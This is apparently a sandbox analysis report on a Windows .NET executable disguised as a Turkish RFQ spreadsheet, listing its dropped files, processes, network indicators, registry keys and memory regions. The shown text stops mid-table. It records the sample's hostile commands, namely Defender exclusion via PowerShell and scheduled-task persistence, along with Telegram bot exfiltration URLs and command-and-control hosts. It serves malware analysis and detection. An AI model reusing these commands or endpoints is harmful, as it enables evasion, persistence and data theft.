Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\qovDEn.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\qovDEn.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\qovDEn.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gbwejyd.2q3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwxsesfe.vsy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4o5ji5g.0wd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3v321xo.qac.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nuxsommc.0ve.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_te0ocm1v.dqo.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0gbpkkv.ys4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xr3025qc.miz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmp8E5C.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
|
"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F
TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qovDEn.exe"
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp7EFB.tmp"
|
|
|
|
C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
|
"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
|
|
|
|
C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe
|
"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\qovDEn.exe
|
C:\Users\user\AppData\Roaming\qovDEn.exe
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qovDEn" /XML "C:\Users\user\AppData\Local\Temp\tmp8E5C.tmp"
|
|
|
|
C:\Users\user\AppData\Roaming\qovDEn.exe
|
"C:\Users\user\AppData\Roaming\qovDEn.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 5 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://www.office.com/
|
unknown
|
||
|
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2014/10/2024%20/%2019:08:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
|
149.154.167.220
|
||
|
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
|
https://duckduckgo.com/ac/?q=
|
unknown
|
||
|
https://api.telegram.org
|
unknown
|
||
|
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
|
https://api.telegram.org/bot
|
unknown
|
||
|
http://tempuri.org/DataSet1.xsd
|
unknown
|
||
|
https://www.office.com/lB
|
unknown
|
||
|
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
|
http://checkip.dyndns.org
|
unknown
|
||
|
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/8.46.123.33
|
188.114.97.3
|
||
|
https://api.telegram.org/bot/sendMessage?chat_id=&text=
|
unknown
|
||
|
https://chrome.google.com/webstore?hl=en
|
unknown
|
||
|
https://www.ecosia.org/newtab/
|
unknown
|
||
|
http://varders.kozow.com:8081
|
unknown
|
||
|
http://aborters.duckdns.org:8081
|
unknown
|
||
|
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
|
http://checkip.dyndns.org/
|
158.101.44.242
|
||
|
https://reallyfreegeoip.org/xml/8.46.123.33$
|
unknown
|
||
|
http://anotherarmy.dns.army:8081
|
unknown
|
||
|
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
|
http://checkip.dyndns.org/q
|
unknown
|
||
|
https://chrome.google.com/webstore?hl=enlB
|
unknown
|
||
|
https://reallyfreegeoip.org
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
|
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2014/10/2024%20/%2018:29:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
|
149.154.167.220
|
||
|
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20a
|
unknown
|
||
|
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
reallyfreegeoip.org
|
188.114.97.3
|
|
|
|
api.telegram.org
|
149.154.167.220
|
|
|
|
checkip.dyndns.org
|
unknown
|
|
|
|
checkip.dyndns.com
|
158.101.44.242
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
|
|
|
188.114.97.3
|
reallyfreegeoip.org
|
European Union
|
|
|
|
158.101.44.242
|
checkip.dyndns.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\qovDEn_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3FC6000
|
trusted library allocation
|
page read and write
|
|
|
|
33A1000
|
trusted library allocation
|
page read and write
|
|
|
|
3061000
|
trusted library allocation
|
page read and write
|
|
|
|
4185000
|
trusted library allocation
|
page read and write
|
|
|
|
432000
|
remote allocation
|
page execute and read and write
|
|
|
|
434000
|
remote allocation
|
page execute and read and write
|
|
|
|
3169000
|
trusted library allocation
|
page read and write
|
||
|
1308000
|
heap
|
page read and write
|
||
|
2FAF000
|
stack
|
page read and write
|
||
|
671E000
|
stack
|
page read and write
|
||
|
1170000
|
heap
|
page read and write
|
||
|
5DE0000
|
trusted library allocation
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
3359000
|
trusted library allocation
|
page read and write
|
||
|
744E000
|
stack
|
page read and write
|
||
|
2D6C000
|
stack
|
page read and write
|
||
|
34AA000
|
trusted library allocation
|
page read and write
|
||
|
5B4A000
|
trusted library allocation
|
page read and write
|
||
|
6280000
|
heap
|
page read and write
|
||
|
585D000
|
stack
|
page read and write
|
||
|
6C28000
|
trusted library allocation
|
page read and write
|
||
|
3221000
|
trusted library allocation
|
page read and write
|
||
|
1700000
|
heap
|
page read and write
|
||
|
3243000
|
trusted library allocation
|
page read and write
|
||
|
1422000
|
trusted library allocation
|
page read and write
|
||
|
5DC0000
|
trusted library allocation
|
page read and write
|
||
|
129C000
|
heap
|
page read and write
|
||
|
12A5000
|
heap
|
page read and write
|
||
|
16F0000
|
trusted library allocation
|
page read and write
|
||
|
57DE000
|
stack
|
page read and write
|
||
|
53B0000
|
trusted library allocation
|
page read and write
|
||
|
71C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3117000
|
trusted library allocation
|
page read and write
|
||
|
4597000
|
trusted library allocation
|
page read and write
|
||
|
58EE000
|
stack
|
page read and write
|
||
|
3154000
|
trusted library allocation
|
page read and write
|
||
|
36A5000
|
trusted library allocation
|
page read and write
|
||
|
32DD000
|
trusted library allocation
|
page read and write
|
||
|
2D10000
|
trusted library allocation
|
page read and write
|
||
|
C28C000
|
stack
|
page read and write
|
||
|
4746000
|
trusted library allocation
|
page read and write
|
||
|
3411000
|
trusted library allocation
|
page read and write
|
||
|
6228000
|
heap
|
page read and write
|
||
|
1204000
|
trusted library allocation
|
page read and write
|
||
|
BC4E000
|
stack
|
page read and write
|
||
|
1110000
|
heap
|
page read and write
|
||
|
77EE000
|
stack
|
page read and write
|
||
|
4148000
|
trusted library allocation
|
page read and write
|
||
|
3452000
|
trusted library allocation
|
page read and write
|
||
|
32B2000
|
trusted library allocation
|
page read and write
|
||
|
47AB000
|
trusted library allocation
|
page read and write
|
||
|
43A1000
|
trusted library allocation
|
page read and write
|
||
|
30AF000
|
trusted library allocation
|
page read and write
|
||
|
72A7000
|
trusted library allocation
|
page read and write
|
||
|
59B0000
|
trusted library allocation
|
page read and write
|
||
|
3446000
|
trusted library allocation
|
page read and write
|
||
|
1678000
|
heap
|
page read and write
|
||
|
2A6D000
|
stack
|
page read and write
|
||
|
2FD4000
|
trusted library allocation
|
page read and write
|
||
|
7320000
|
heap
|
page read and write
|
||
|
3561000
|
trusted library allocation
|
page read and write
|
||
|
6D60000
|
trusted library allocation
|
page read and write
|
||
|
5550000
|
trusted library allocation
|
page read and write
|
||
|
3102000
|
trusted library allocation
|
page read and write
|
||
|
5AEE000
|
stack
|
page read and write
|
||
|
2B5E000
|
unkown
|
page read and write
|
||
|
2FD6000
|
trusted library allocation
|
page read and write
|
||
|
58E0000
|
heap
|
page read and write
|
||
|
11A5000
|
heap
|
page read and write
|
||
|
4230000
|
trusted library allocation
|
page read and write
|
||
|
124F000
|
heap
|
page read and write
|
||
|
1040000
|
heap
|
page read and write
|
||
|
44B0000
|
trusted library allocation
|
page read and write
|
||
|
665E000
|
stack
|
page read and write
|
||
|
433B000
|
trusted library allocation
|
page read and write
|
||
|
440000
|
remote allocation
|
page execute and read and write
|
||
|
30D5000
|
trusted library allocation
|
page read and write
|
||
|
3100000
|
trusted library allocation
|
page read and write
|
||
|
5980000
|
trusted library allocation
|
page execute and read and write
|
||
|
1120000
|
heap
|
page read and write
|
||
|
3113000
|
trusted library allocation
|
page read and write
|
||
|
1160000
|
heap
|
page read and write
|
||
|
13AE000
|
stack
|
page read and write
|
||
|
35F3000
|
trusted library allocation
|
page read and write
|
||
|
78F5000
|
trusted library allocation
|
page read and write
|
||
|
6DD0000
|
heap
|
page read and write
|
||
|
65DE000
|
stack
|
page read and write
|
||
|
120D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4089000
|
trusted library allocation
|
page read and write
|
||
|
3618000
|
trusted library allocation
|
page read and write
|
||
|
5750000
|
heap
|
page execute and read and write
|
||
|
6C80000
|
trusted library allocation
|
page execute and read and write
|
||
|
3010000
|
trusted library allocation
|
page read and write
|
||
|
4246000
|
trusted library allocation
|
page read and write
|
||
|
5846000
|
trusted library allocation
|
page read and write
|
||
|
441F000
|
trusted library allocation
|
page read and write
|
||
|
2D45000
|
trusted library allocation
|
page execute and read and write
|
||
|
4209000
|
trusted library allocation
|
page read and write
|
||
|
4ED8000
|
trusted library allocation
|
page read and write
|
||
|
16C0000
|
heap
|
page read and write
|
||
|
472A000
|
trusted library allocation
|
page read and write
|
||
|
695F000
|
stack
|
page read and write
|
||
|
B650000
|
heap
|
page read and write
|
||
|
446C000
|
trusted library allocation
|
page read and write
|
||
|
419D000
|
trusted library allocation
|
page read and write
|
||
|
444C000
|
trusted library allocation
|
page read and write
|
||
|
61C4000
|
heap
|
page read and write
|
||
|
584E000
|
trusted library allocation
|
page read and write
|
||
|
3583000
|
trusted library allocation
|
page read and write
|
||
|
13B0000
|
heap
|
page read and write
|
||
|
3103000
|
trusted library allocation
|
page read and write
|
||
|
61E7000
|
heap
|
page read and write
|
||
|
1512000
|
trusted library allocation
|
page read and write
|
||
|
3080000
|
heap
|
page execute and read and write
|
||
|
813D000
|
stack
|
page read and write
|
||
|
3050000
|
heap
|
page execute and read and write
|
||
|
3216000
|
trusted library allocation
|
page read and write
|
||
|
515E000
|
stack
|
page read and write
|
||
|
1618000
|
trusted library allocation
|
page read and write
|
||
|
4402000
|
trusted library allocation
|
page read and write
|
||
|
55E3000
|
heap
|
page read and write
|
||
|
4373000
|
trusted library allocation
|
page read and write
|
||
|
DF0000
|
heap
|
page read and write
|
||
|
2E2F000
|
stack
|
page read and write
|
||
|
43C9000
|
trusted library allocation
|
page read and write
|
||
|
15FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
369D000
|
trusted library allocation
|
page read and write
|
||
|
2E8F000
|
stack
|
page read and write
|
||
|
5620000
|
heap
|
page read and write
|
||
|
33FB000
|
trusted library allocation
|
page read and write
|
||
|
549E000
|
stack
|
page read and write
|
||
|
2D90000
|
trusted library allocation
|
page read and write
|
||
|
BA0000
|
unkown
|
page readonly
|
||
|
6C26000
|
trusted library allocation
|
page read and write
|
||
|
58D0000
|
heap
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page execute and read and write
|
||
|
328C000
|
stack
|
page read and write
|
||
|
1420000
|
trusted library allocation
|
page read and write
|
||
|
442A000
|
trusted library allocation
|
page read and write
|
||
|
72B0000
|
trusted library allocation
|
page read and write
|
||
|
DB0000
|
heap
|
page read and write
|
||
|
680D000
|
heap
|
page read and write
|
||
|
31D7000
|
trusted library allocation
|
page read and write
|
||
|
53E0000
|
trusted library allocation
|
page read and write
|
||
|
2D2E000
|
stack
|
page read and write
|
||
|
2DDF000
|
unkown
|
page read and write
|
||
|
369F000
|
trusted library allocation
|
page read and write
|
||
|
122E000
|
heap
|
page read and write
|
||
|
40E0000
|
trusted library allocation
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
41BD000
|
trusted library allocation
|
page read and write
|
||
|
618E000
|
heap
|
page read and write
|
||
|
11A8000
|
heap
|
page read and write
|
||
|
5573000
|
heap
|
page read and write
|
||
|
4171000
|
trusted library allocation
|
page read and write
|
||
|
2FD1000
|
trusted library allocation
|
page read and write
|
||
|
B9AF000
|
stack
|
page read and write
|
||
|
320E000
|
trusted library allocation
|
page read and write
|
||
|
4432000
|
trusted library allocation
|
page read and write
|
||
|
345A000
|
trusted library allocation
|
page read and write
|
||
|
5B24000
|
trusted library allocation
|
page read and write
|
||
|
1430000
|
trusted library allocation
|
page read and write
|
||
|
153A000
|
heap
|
page read and write
|
||
|
7300000
|
heap
|
page read and write
|
||
|
43BB000
|
trusted library allocation
|
page read and write
|
||
|
2FCE000
|
trusted library allocation
|
page read and write
|
||
|
5430000
|
trusted library allocation
|
page read and write
|
||
|
7F8D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7293000
|
trusted library allocation
|
page read and write
|
||
|
14BF000
|
stack
|
page read and write
|
||
|
71E0000
|
trusted library allocation
|
page read and write
|
||
|
30C7000
|
trusted library allocation
|
page read and write
|
||
|
4283000
|
trusted library allocation
|
page read and write
|
||
|
4407000
|
trusted library allocation
|
page read and write
|
||
|
1450000
|
trusted library allocation
|
page read and write
|
||
|
4716000
|
trusted library allocation
|
page read and write
|
||
|
2D40000
|
trusted library allocation
|
page read and write
|
||
|
BEEE000
|
stack
|
page read and write
|
||
|
7C0E000
|
stack
|
page read and write
|
||
|
4655000
|
trusted library allocation
|
page read and write
|
||
|
310A000
|
trusted library allocation
|
page execute and read and write
|
||
|
40C8000
|
trusted library allocation
|
page read and write
|
||
|
5ADE000
|
stack
|
page read and write
|
||
|
2D32000
|
trusted library allocation
|
page read and write
|
||
|
6A5E000
|
stack
|
page read and write
|
||
|
441000
|
remote allocation
|
page execute and read and write
|
||
|
7770000
|
heap
|
page read and write
|
||
|
71D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5DD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
71EA000
|
trusted library allocation
|
page read and write
|
||
|
1426000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DB0000
|
trusted library allocation
|
page read and write
|
||
|
8B5E000
|
stack
|
page read and write
|
||
|
45C2000
|
trusted library allocation
|
page read and write
|
||
|
32D2000
|
trusted library allocation
|
page read and write
|
||
|
5710000
|
trusted library allocation
|
page read and write
|
||
|
5866000
|
trusted library allocation
|
page read and write
|
||
|
12A7000
|
heap
|
page read and write
|
||
|
6AE2000
|
heap
|
page read and write
|
||
|
6187000
|
heap
|
page read and write
|
||
|
43AF000
|
trusted library allocation
|
page read and write
|
||
|
31AB000
|
trusted library allocation
|
page read and write
|
||
|
2FBB000
|
trusted library allocation
|
page read and write
|
||
|
2FD6000
|
trusted library allocation
|
page read and write
|
||
|
72A0000
|
trusted library allocation
|
page read and write
|
||
|
343E000
|
trusted library allocation
|
page read and write
|
||
|
3270000
|
trusted library allocation
|
page read and write
|
||
|
6DE0000
|
heap
|
page read and write
|
||
|
442000
|
remote allocation
|
page execute and read and write
|
||
|
5570000
|
heap
|
page read and write
|
||
|
55D0000
|
heap
|
page execute and read and write
|
||
|
43F6000
|
trusted library allocation
|
page read and write
|
||
|
67B8000
|
heap
|
page read and write
|
||
|
59B5000
|
trusted library allocation
|
page read and write
|
||
|
336B000
|
trusted library allocation
|
page read and write
|
||
|
70DF000
|
stack
|
page read and write
|
||
|
16B0000
|
trusted library allocation
|
page read and write
|
||
|
32E1000
|
trusted library allocation
|
page read and write
|
||
|
5970000
|
trusted library allocation
|
page read and write
|
||
|
2D36000
|
trusted library allocation
|
page execute and read and write
|
||
|
789A000
|
trusted library allocation
|
page read and write
|
||
|
3365000
|
trusted library allocation
|
page read and write
|
||
|
7290000
|
trusted library allocation
|
page read and write
|
||
|
141D000
|
trusted library allocation
|
page execute and read and write
|
||
|
B54E000
|
stack
|
page read and write
|
||
|
3115000
|
trusted library allocation
|
page execute and read and write
|
||
|
3110000
|
trusted library allocation
|
page read and write
|
||
|
5720000
|
trusted library allocation
|
page execute and read and write
|
||
|
40E5000
|
trusted library allocation
|
page read and write
|
||
|
415E000
|
trusted library allocation
|
page read and write
|
||
|
681E000
|
stack
|
page read and write
|
||
|
6D5E000
|
stack
|
page read and write
|
||
|
3315000
|
trusted library allocation
|
page read and write
|
||
|
7280000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D80000
|
trusted library allocation
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
5840000
|
trusted library allocation
|
page read and write
|
||
|
53D6000
|
trusted library allocation
|
page read and write
|
||
|
29DD000
|
stack
|
page read and write
|
||
|
1645000
|
heap
|
page read and write
|
||
|
14E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D4B000
|
trusted library allocation
|
page execute and read and write
|
||
|
78A0000
|
trusted library allocation
|
page read and write
|
||
|
469D000
|
trusted library allocation
|
page read and write
|
||
|
BECE000
|
stack
|
page read and write
|
||
|
1410000
|
trusted library allocation
|
page read and write
|
||
|
3659000
|
trusted library allocation
|
page read and write
|
||
|
72D0000
|
trusted library allocation
|
page read and write
|
||
|
61DF000
|
stack
|
page read and write
|
||
|
56E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6C60000
|
trusted library allocation
|
page read and write
|
||
|
695E000
|
stack
|
page read and write
|
||
|
40CF000
|
trusted library allocation
|
page read and write
|
||
|
1510000
|
trusted library allocation
|
page read and write
|
||
|
14ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D14000
|
trusted library allocation
|
page read and write
|
||
|
1200000
|
trusted library allocation
|
page read and write
|
||
|
3091000
|
trusted library allocation
|
page read and write
|
||
|
151B000
|
trusted library allocation
|
page execute and read and write
|
||
|
BD8E000
|
stack
|
page read and write
|
||
|
B98E000
|
stack
|
page read and write
|
||
|
42D000
|
remote allocation
|
page execute and read and write
|
||
|
36A3000
|
trusted library allocation
|
page read and write
|
||
|
DE7000
|
stack
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
14F0000
|
trusted library allocation
|
page read and write
|
||
|
3050000
|
trusted library allocation
|
page execute and read and write
|
||
|
40D6000
|
trusted library allocation
|
page read and write
|
||
|
3F68000
|
trusted library allocation
|
page read and write
|
||
|
7792000
|
heap
|
page read and write
|
||
|
36A9000
|
trusted library allocation
|
page read and write
|
||
|
5A5E000
|
stack
|
page read and write
|
||
|
11F0000
|
trusted library allocation
|
page read and write
|
||
|
15E0000
|
trusted library allocation
|
page read and write
|
||
|
BBB0000
|
heap
|
page read and write
|
||
|
59BA000
|
trusted library allocation
|
page read and write
|
||
|
119E000
|
stack
|
page read and write
|
||
|
14E0000
|
trusted library allocation
|
page read and write
|
||
|
170A000
|
heap
|
page read and write
|
||
|
6F5E000
|
stack
|
page read and write
|
||
|
5820000
|
trusted library allocation
|
page read and write
|
||
|
42A2000
|
trusted library allocation
|
page read and write
|
||
|
5413000
|
heap
|
page read and write
|
||
|
6816000
|
heap
|
page read and write
|
||
|
6CA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
364F000
|
trusted library allocation
|
page read and write
|
||
|
5AFD000
|
stack
|
page read and write
|
||
|
3020000
|
trusted library allocation
|
page read and write
|
||
|
4412000
|
trusted library allocation
|
page read and write
|
||
|
2FF6000
|
trusted library allocation
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
4833000
|
trusted library allocation
|
page read and write
|
||
|
6A9E000
|
stack
|
page read and write
|
||
|
45E1000
|
trusted library allocation
|
page read and write
|
||
|
44DC000
|
trusted library allocation
|
page read and write
|
||
|
3F88000
|
trusted library allocation
|
page read and write
|
||
|
57E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
435E000
|
trusted library allocation
|
page read and write
|
||
|
2D1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
54FD000
|
stack
|
page read and write
|
||
|
40EB000
|
trusted library allocation
|
page read and write
|
||
|
5480000
|
heap
|
page read and write
|
||
|
6D4E000
|
stack
|
page read and write
|
||
|
4846000
|
trusted library allocation
|
page read and write
|
||
|
3107000
|
trusted library allocation
|
page read and write
|
||
|
40F4000
|
trusted library allocation
|
page read and write
|
||
|
1210000
|
heap
|
page read and write
|
||
|
3130000
|
trusted library allocation
|
page read and write
|
||
|
1517000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
6160000
|
heap
|
page read and write
|
||
|
53BB000
|
trusted library allocation
|
page read and write
|
||
|
B34E000
|
stack
|
page read and write
|
||
|
53F0000
|
trusted library allocation
|
page read and write
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
361B000
|
trusted library allocation
|
page read and write
|
||
|
11A0000
|
heap
|
page read and write
|
||
|
586D000
|
